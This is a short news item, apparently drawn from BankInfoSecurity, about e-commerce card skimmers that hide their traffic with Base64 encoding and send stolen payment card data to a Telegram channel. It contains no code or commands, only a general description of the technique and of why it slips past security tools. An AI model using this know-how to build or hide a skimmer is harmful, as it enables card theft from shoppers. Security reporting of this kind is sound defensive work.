According to BankInfoSecurity, hackers are using simple Base64 encoding strings in conjunction with a bot that is sweeping up the payment card information, while including a code that accesses Telegram to remove the payment card data. Therefore, Base64 enables the payment card data to be taken without security tools picking up the theft. Although other cybercriminals have previously used Telegram to distribute malware and steal data, the first time when fraud was detected on this channel was in August 2020 by security researcher AffableKraut.
Moreover, in the majority of skimming attacks, the payment card data is stored within a domain or file controlled by the attackers and then exfiltrated using a command-and-control infrastructure that communicates with a JavaScript code. However, the attacks leveraging Telegram use encryption in conjunction with a Telegram channel to create a faster and more efficient exfiltration process.
Consequently, when the shopper enters his payment information on an ecommerce site, that information is transferred to a payment processor, as usual, but a copy is also sent to the fraudsters. By using Telegram, hackers can quickly collect the payment card data and use it to purchase goods or sell it on underground forums, method which helps fraudsters to avoid detection.
Every day we send out a free e-mail with the most important headlines of the last 24 hours.
Subscribe now